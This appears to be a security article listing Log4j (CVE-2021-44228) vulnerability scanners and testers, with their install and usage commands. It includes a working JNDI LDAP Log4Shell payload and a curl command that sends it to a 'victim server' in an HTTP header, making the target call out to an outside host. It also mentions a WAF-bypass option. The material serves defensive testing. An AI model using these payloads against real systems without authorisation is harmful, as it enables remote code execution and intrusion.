Log4j is a widely used software library for logging security and performance information. Security experts discovered a Zero-day vulnerability in the popular library, affecting many enterprise IT systems. Several vendors have released different tools, but a second vulnerability is discovered after a short time. The Apache Software Foundation has pushed out a new fix after that. If your system has any Java application using a version of Log4j before 2.14.1, you should act very quickly. You can scan your system to check the Log4j vulnerability with the following tools quickly.
Table of Contents
Apache Log4j CVE-2021-44228 Scanner
Scanning your system to check for the Apache Log4j vulnerability is very easy. All you have to do is executing the open-source tool: Apache Log4j CVE-2021-44228 developed by Adil Soybali, a security researcher from Seccops Cyber Security Technologies Inc.
Features
- Scanning according to the URL list you provide.
- Scanning by finding the subdomains of the provided domain name.
- Adding the source domain as a prefix to determine from which source the incoming DNS queries are coming.
Requirements
Installation
git clone https://github.com/adilsoybali/Log4j-RCE-Scanner.gitcd Log4j-RCE-Scannerchmod +x log4j-rce-scanner.sh
Usage
./log4j-rce-scanner.sh -h
This will display help for the tool. Here are all the switches it supports.
-h, --help - Display help
-l, --url-list - List of domain/subdomain/ip to be used for scanning.
-d, --domain - The domain name to which all subdomains and itself will be checked.
-b, --burpcollabid - Burp collabrator client id address or interactsh domain address.
Example uses:
./log4j-rce-scanner.sh -l httpxsubdomains.txt -b yrt45r4sjyoj19617jem5briio3cs.burpcollaborator.net
./log4j-rce-scanner.sh -d adilsoybali.com -b yrt45r4sjyoj19617jem5briio3cs.burpcollaborator.net
- Burp collaborator documentation page
- Easy way to set up a custom Burp Collaborator instance in a docker environment
- Interactsh
Official GitHub Repository
CISA Log4j Scanner
https://github.com/cisagov/log4j-scanner
This repository provides a scanning solution for the log4j Remote Code Execution vulnerabilities (CVE-2021-44228 & CVE-2021-45046). The information and code in this repository is provided “as is” and were assembled with the help of the open-source community and updated by CISA through collaboration with the broader cybersecurity community. This is not intended to be a 100% true positive solution; False negatives may occur.
Usage
Scan a Single URL
$ python3 log4j-scan.py -u https://log4j.lab.secbot.local
Scan a Single URL using all Request Methods: GET, POST (url-encoded form), POST (JSON body)
$ python3 log4j-scan.py -u https://log4j.lab.secbot.local --run-all-tests
Discover WAF bypasses on the environment.
$ python3 log4j-scan.py -u https://log4j.lab.secbot.local --waf-bypass
Scan a list of URLs
$ python3 log4j-scan.py -l urls.txt
Huntress Labs log4shell tester
https://log4shell.huntress.com
This tester provides a payload with a unique identifier and accepts LDAP connections from vulnerable apps and displays the IP address receiving connections. The sample code (payload) mentioned bottom can also be used to test this out.
Usage
You simply copy and paste the generated JNDI syntax (payload) (the code block ${jndi[:]ldap[:]//.... presented below) into anything (application input boxes, frontend site form fields, logins such as username inputs, or if you are a bit more technical, even User-Agent or X-Forwarded-For or other customizable HTTP headers).
Sample Code (Payload):
${jndi:ldap://log4shell.huntress.com:1389/(your_random_huntress_url}
How to send the Log4j payload to the victim server?
- You can send the payload to the victim server using a user agent switcher extension on your web browser.
- You can also send a curl request to the victim server via the Linux terminal.
curl http://vulnerable-app:8080 \ -H 'X-Api-Version: ${jndi:ldap://log4shell.huntress.com:1389/(your_random_huntress_url}'
Trend Micro Log4j Vulnerability Tester
Usage
Watch the video below on how to use the Log4J tester.
Related Stories
- Two new vulnerabilities are found on Log4j, only one of them is fixed yet
- CISA published an emergency directive for Log4j
- Google joining the war against Log4j exploits
- Hackers exploit Log4j to inject Monero miners, shifting from LDAP to RMI
- A third, new Apache Log4j vulnerability is discovered
- The Log4j flaw is patched but it is still vulnerable
- CISA published Log4j vulnerability guidance
- Zero-day Apache Log4j RCE vulnerability (Log4Shell) is being exploited